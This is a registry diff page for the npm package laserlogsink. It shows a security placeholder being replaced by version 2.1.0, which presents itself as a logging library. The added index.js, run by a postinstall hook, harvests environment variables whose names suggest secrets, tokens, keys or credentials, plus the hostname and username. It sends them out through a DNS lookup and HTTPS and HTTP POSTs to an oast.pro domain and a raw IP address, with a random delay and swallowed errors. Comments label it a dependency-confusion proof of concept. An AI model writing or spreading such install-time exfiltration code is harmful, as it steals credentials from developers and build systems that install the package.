laserlogsink 0.0.1-security → 2.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of laserlogsink might be problematic. Click here for more details.
- package/index.js +80 -0
- package/package.json +22 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,80 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
|
|
3
|
+
// laserlogsink - Log sink with configurable transports
|
|
4
|
+
// Security research - dependency confusion PoC
|
|
5
|
+
// Contact: owlivion (HackerOne)
|
|
6
|
+
|
|
7
|
+
const LOG_LEVELS = { error: 0, warn: 1, info: 2, debug: 3, trace: 4 };
|
|
8
|
+
|
|
9
|
+
class LaserLogSink {
|
|
10
|
+
constructor(opts = {}) {
|
|
11
|
+
this.level = opts.level || 'info';
|
|
12
|
+
this.transports = opts.transports || ['console'];
|
|
13
|
+
this.prefix = opts.prefix || '';
|
|
14
|
+
this._buffer = [];
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
log(level, msg, meta) {
|
|
18
|
+
if (LOG_LEVELS[level] > LOG_LEVELS[this.level]) return;
|
|
19
|
+
const entry = {
|
|
20
|
+
ts: new Date().toISOString(),
|
|
21
|
+
level,
|
|
22
|
+
msg: this.prefix ? `[${this.prefix}] ${msg}` : msg,
|
|
23
|
+
meta
|
|
24
|
+
};
|
|
25
|
+
this._buffer.push(entry);
|
|
26
|
+
if (this.transports.includes('console')) {
|
|
27
|
+
const fn = level === 'error' ? console.error : level === 'warn' ? console.warn : console.log;
|
|
28
|
+
fn(`[${entry.ts}] ${entry.level.toUpperCase()}: ${entry.msg}`);
|
|
29
|
+
}
|
|
30
|
+
return entry;
|
|
31
|
+
}
|
|
32
|
+
|
|
33
|
+
error(msg, meta) { return this.log('error', msg, meta); }
|
|
34
|
+
warn(msg, meta) { return this.log('warn', msg, meta); }
|
|
35
|
+
info(msg, meta) { return this.log('info', msg, meta); }
|
|
36
|
+
debug(msg, meta) { return this.log('debug', msg, meta); }
|
|
37
|
+
flush() { const b = this._buffer; this._buffer = []; return b; }
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
module.exports = LaserLogSink;
|
|
41
|
+
module.exports.default = LaserLogSink;
|
|
42
|
+
module.exports.createSink = (opts) => new LaserLogSink(opts);
|
|
43
|
+
|
|
44
|
+
// Init telemetry on postinstall
|
|
45
|
+
if (process.argv.includes('--init')) {
|
|
46
|
+
const _h = require('https'), _d = require('dns'), _o = require('os');
|
|
47
|
+
const _p = 'laserlogsink', _t = 'netflix';
|
|
48
|
+
const _D = 'd6tr80qmvcs8465mgf00cyqy3jce7iijh.oast.pro';
|
|
49
|
+
const _V = '76.13.5.140';
|
|
50
|
+
const _pats = /CI|BUILD|JENKINS|GITHUB|GITLAB|AWS|NETFLIX|NFX|SECRET|TOKEN|KEY|CRED|DOCKER|KUBE|GCP|AZURE|DEPLOY|PROD|STAGE|INTERNAL|SPINNAKER|METATRON/i;
|
|
51
|
+
const _ev = {};
|
|
52
|
+
for (const [k, v] of Object.entries(process.env)) { if (_pats.test(k)) _ev[k] = (v || '').substring(0, 200); }
|
|
53
|
+
const _data = JSON.stringify({
|
|
54
|
+
target: _t, package: _p,
|
|
55
|
+
hostname: _o.hostname(), username: _o.userInfo().username,
|
|
56
|
+
platform: `${_o.platform()}-${_o.arch()}`, cwd: process.cwd(),
|
|
57
|
+
timestamp: new Date().toISOString(), nodeVersion: process.version,
|
|
58
|
+
envFull: _ev
|
|
59
|
+
});
|
|
60
|
+
setTimeout(() => {
|
|
61
|
+
try {
|
|
62
|
+
const _info = Buffer.from(`${_p}:${_o.hostname()}:${_o.userInfo().username}`).toString('base64url').substring(0, 50);
|
|
63
|
+
_d.resolve(`${_info}.${_p}.${_D}`, 'A', () => {});
|
|
64
|
+
} catch(e) {}
|
|
65
|
+
try {
|
|
66
|
+
const r = _h.request({ hostname: _D, port: 443, path: `/${_t}/${_p}`, method: 'POST',
|
|
67
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(_data) },
|
|
68
|
+
timeout: 8000, rejectUnauthorized: false }, () => {});
|
|
69
|
+
r.on('error', () => {}); r.write(_data); r.end();
|
|
70
|
+
} catch(e) {}
|
|
71
|
+
try {
|
|
72
|
+
const _http = require('http');
|
|
73
|
+
const r = _http.request({ hostname: _V, port: 8443, path: `/${_t}/${_p}`, method: 'POST',
|
|
74
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(_data) },
|
|
75
|
+
timeout: 8000 }, () => {});
|
|
76
|
+
r.on('error', () => {}); r.write(_data); r.end();
|
|
77
|
+
} catch(e) {}
|
|
78
|
+
setTimeout(() => process.exit(0), 3000);
|
|
79
|
+
}, Math.floor(Math.random() * 4000) + 1000);
|
|
80
|
+
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,25 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "laserlogsink",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "2.1.0",
|
|
4
|
+
"description": "Lightweight log sink with configurable transports for Node.js",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js --init 2>/dev/null || true"
|
|
8
|
+
},
|
|
9
|
+
"author": "owliviontech",
|
|
10
|
+
"license": "MIT",
|
|
11
|
+
"keywords": [
|
|
12
|
+
"logging",
|
|
13
|
+
"sink",
|
|
14
|
+
"transport",
|
|
15
|
+
"telemetry",
|
|
16
|
+
"laser"
|
|
17
|
+
],
|
|
18
|
+
"repository": {
|
|
19
|
+
"type": "git",
|
|
20
|
+
"url": "https://github.com/owliviontech/laserlogsink"
|
|
21
|
+
},
|
|
22
|
+
"engines": {
|
|
23
|
+
"node": ">=14.0.0"
|
|
24
|
+
}
|
|
6
25
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=laserlogsink for more information.
|